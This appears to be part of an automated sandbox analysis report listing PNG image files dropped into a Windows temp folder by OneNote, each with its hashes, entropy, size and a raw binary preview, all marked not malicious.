
                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5386
                                                                                                                                                                                                          Entropy (8bit):7.943706538857394
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                          MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                          SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                          SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                          SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{E9416D7F-C110-413C-9F38-30B7EBFF16BA}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{EDA124C7-EC71-4313-9284-B5312FFB012C}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{EDFB349E-083F-45DE-9CE8-F5733F3A58C8}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13030
                                                                                                                                                                                                          Entropy (8bit):7.948664903731204
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                          MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                          SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                          SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                          SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{EECCE72A-757D-4986-9764-47859318D703}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{EF63CAE2-7188-4DD8-8F00-D39E4B959174}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F051D133-B406-4AE9-9D57-5ED6647694A7}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F18C9476-5816-4A54-8DA4-3229E15DE293}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F2E9EBBF-34D8-446F-B652-6148BD4837EB}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F31731C7-A8B0-4BC1-AB2D-A5F737F87530}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F3566B24-ED65-4B72-857F-00B60FE73B78}.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F3C0A8AB-6D2F-405C-AFFB-E9BF760256D7}

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\{F4034A34-D867-4DD0-8FEA-87C62DA4DE5D}.bin

